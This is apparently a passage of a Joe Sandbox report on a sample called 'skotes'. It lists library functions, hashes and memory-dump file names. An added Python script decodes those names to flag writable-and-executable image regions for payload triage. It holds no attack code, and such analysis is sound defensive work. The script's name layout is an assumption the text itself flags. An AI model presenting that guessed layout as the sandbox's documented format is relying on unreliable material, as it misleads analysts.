• Instruction ID: 81b44c00f7da6fb46b831a38c905d36a78026d2a5f1e4fcf8c16f5c45c897d6a
• Opcode Fuzzy Hash: 93f05e7ad1d219d688c66ea9ff4ae7339e0592e4dd16ec30e9dc2cba2f5a1fc7
• Instruction Fuzzy Hash: 7AC17771800649DFCF29DFA4CC84EBEBBB6EF14311B44415EE8166B212D770EA91CB95
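The dump file names under Memory Dump Source encode, per region, a base address and a page protection value, which is what tells an analyst which of these dumps hold code that was written at run time. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses those names and lists the image regions that were writable and executable at dump time. The field layout is an assumption inferred from the names on this page: the first, second and fourth fields agree with the snapshot name hcaresult_3_2_690000 (process, step, base), the fifth field decodes cleanly as winnt.h PAGE_* values (0x40, 0x04, 0x80 all occur above) and 0x01000000 in the seventh field is MEM_IMAGE; the third, sixth and eighth fields are kept as opaque integers. The six sample names are copied from the listing above.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# winnt.h page protection values (low byte of the protection field).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
WRITE_AND_EXECUTE = (0x40, 0x80)

# winnt.h MEMORY_BASIC_INFORMATION.Type values.
MEM_TYPE = {
    0x00020000: "MEM_PRIVATE",
    0x00040000: "MEM_MAPPED",
    0x01000000: "MEM_IMAGE",
}

# Assumed layout of a Joe Sandbox .sdmp name (hex fields unless noted):
#   <process>.<step>.<sequence, decimal>.<base>.<protect>.<f6>.<type>.<f8>.sdmp
# process/step/base agree with the snapshot name hcaresult_3_2_690000 on the page;
# protect and type decode as winnt.h constants; sequence, f6 and f8 are kept raw.
SDMP_NAME = re.compile(
    r"^(?P<process>[0-9a-f]{8})\.(?P<step>[0-9a-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<mtype>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class SdmpRegion:
    process: int
    step: int
    seq: int
    base: int
    protect: int
    mem_type: int
    name: str

    @property
    def protect_name(self) -> str:
        label = PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:08x}")
        return label + "|PAGE_GUARD" if self.protect & PAGE_GUARD else label

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:08x}")

    @property
    def writable_and_executable(self) -> bool:
        return (self.protect & 0xFF) in WRITE_AND_EXECUTE


def parse_sdmp_name(name: str) -> Optional[SdmpRegion]:
    """Parse one dump file name; return None if it does not follow the assumed layout."""
    m = SDMP_NAME.match(name.strip())
    if m is None:
        return None
    return SdmpRegion(
        process=int(m["process"], 16),
        step=int(m["step"], 16),
        seq=int(m["seq"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["mtype"], 16),
        name=name.strip(),
    )


def wx_image_regions(names: List[str]) -> List[int]:
    """Base addresses (ascending) of MEM_IMAGE dumps that were writable and executable.
    An image page that is both writable and executable holds code written at run time
    (unpacked or patched in place) rather than code mapped unchanged from disk."""
    regions = [r for r in map(parse_sdmp_name, names) if r is not None]
    return sorted(r.base for r in regions
                  if r.type_name == "MEM_IMAGE" and r.writable_and_executable)


def protection_summary(names: List[str]) -> Dict[str, int]:
    """Count dumps per decoded protection, skipping names that do not parse."""
    regions = [r for r in map(parse_sdmp_name, names) if r is not None]
    return dict(Counter(r.protect_name for r in regions))


# Sample input: six names copied from the Memory Dump Source listing on this page.
SAMPLE_DUMPS = [
    "00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp",
]

if __name__ == "__main__":
    for r in filter(None, map(parse_sdmp_name, SAMPLE_DUMPS)):
        print(f"pid={r.process} base=0x{r.base:08x} {r.protect_name:24} {r.type_name}")
    print("W+X image regions:", [hex(b) for b in wx_image_regions(SAMPLE_DUMPS)])
    print(protection_summary(SAMPLE_DUMPS))
```

Run it against the full Associated list of a report to get the set of W+X image bases in one pass; those are the dumps worth loading first when looking for the unpacked payload, since a normally loaded PE has no section that is both writable and executable.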
APIs
• _ValidateLocalCookies.LIBCMT ref: 006C4877
• ___except_validate_context_record.LIBVCRUNTIME ref: 006C487F
• _ValidateLocalCookies.LIBCMT ref: 006C4908
• __IsNonwritableInCurrentImage.LIBCMT ref: 006C4933
• _ValidateLocalCookies.LIBCMT ref: 006C4988
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: S9l$csm
• API String ID: 1170836740-48277793
• Opcode ID: f20953805513f9933cef10b092e515312783a65108cb2cff81017858e03fb94e
• Instruction ID: d4c1c59136570ede79330c7ef6e97122ed7899bab770da3b10f5bce168fcb7fe
• Opcode Fuzzy Hash: f20953805513f9933cef10b092e515312783a65108cb2cff81017858e03fb94e
• Instruction Fuzzy Hash: 8741E334A002599BCF10DF28C894FAEBBB6EF05314F14815DE8155B392CB31EA41CF91
APIs
• Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 006B73B0
• Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 006B73F2
• Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 006B740E
• Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 006B7419
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 006B7440
Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
• String ID: count$ppVirtualProcessorRoots
• API String ID: 3897347962-3650809737
• Opcode ID: 2bc1a61b7632280387511c5f918c380c964b0820f5c9bbbb72d78d40d97ec76e
• Instruction ID: fe2213f6bff22aeb4f9f449f7144819b447fdc1c3e3b743c31a1591783ebc274
• Opcode Fuzzy Hash: 2bc1a61b7632280387511c5f918c380c964b0820f5c9bbbb72d78d40d97ec76e
• Instruction Fuzzy Hash: EA2171B4A00319AFCB10EF65C5859EDBBB6BF49310F1540A9E901AB351DB30AE81DF94
APIs
• _SpinWait.LIBCONCRT ref: 006AEEBC
• Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 006AEEC8
• Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 006AEEE1
• Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 006AEF0F
• Concurrency::Context::Block.LIBCONCRT ref: 006AEF31
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                                                                                                                          • String ID: ij
                                                                                                                                                                                                                                          • API String ID: 1182035702-3994178257
                                                                                                                                                                                                                                          • Opcode ID: 4b877be240103425bb2eb7abc5adbb1418c1effa6e8dab0cfad018408bee7fa2
                                                                                                                                                                                                                                          • Instruction ID: a81093c8bfae80308651480d0e00fbddef4f9d36425cb67a0c538f04cb700c87
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b877be240103425bb2eb7abc5adbb1418c1effa6e8dab0cfad018408bee7fa2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3210A708142068EDF64EFA4C8556EEBBF2FF16320F10092DE161A6291E7725E85CF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 006B7903
                                                                                                                                                                                                                                            • Part of subcall function 006B5CB8: __EH_prolog3_catch.LIBCMT ref: 006B5CBF
                                                                                                                                                                                                                                            • Part of subcall function 006B5CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 006B5CF8
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 006B792A
• Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 006B7936
  • Part of subcall function 006B5CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 006B5D70
  • Part of subcall function 006B5CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 006B5D7E
• Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 006B7982
• Concurrency::location::_Assign.LIBCMT ref: 006B79A3
• Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 006B79AB
• Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 006B79BD
• Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 006B79ED
  • Part of subcall function 006B691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 006B6942
  • Part of subcall function 006B691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 006B6965
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
• String ID:
• API String ID: 1475861073-0
• Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
• Instruction ID: 86b1a67e6017a81152cbe1ed659cd84bf4a1931c349b645f094b2cdbaa352890
• Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
• Instruction Fuzzy Hash: 083106B0B08255AACF56BA7844927FEBBB79F85300F0401A9D496DB342DB245DCAC391
APIs
• __alloca_probe_16.LIBCMT ref: 006D4C98
• __alloca_probe_16.LIBCMT ref: 006D4D5E
• __freea.LIBCMT ref: 006D4DCA
  • Part of subcall function 006CB04B: RtlAllocateHeap.NTDLL(00000000,440B685B,?,?,006AD3FC,440B685B,?,006A7A8B,?,?,?,?,?,?,00697465,?), ref: 006CB07D
• __freea.LIBCMT ref: 006D4DD3
• __freea.LIBCMT ref: 006D4DF6
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                          • String ID: Zl,ml
                                                                                                                                                                                                                                          • API String ID: 1423051803-2199340090
                                                                                                                                                                                                                                          • Opcode ID: 5c00dd9e86c1f66ad951e2de51788b190ce1fe242be7d9b17a82ad86807dacb1
                                                                                                                                                                                                                                          • Instruction ID: 01f9af0a99479dee896e05f3293eb871e3182d69c903207612e867efc1c55d38
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c00dd9e86c1f66ad951e2de51788b190ce1fe242be7d9b17a82ad86807dacb1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA519172A00216ABEB215F649C42FFB36ABDF84754F15412EFD04A7345EF34DC119AA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 006BDD91
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 006BDDAE
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 006BDE14
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 006BDE29
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 006BDE3B
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 006BDE4B
                                                                                                                                                                                                                                          • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 006BDE74
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
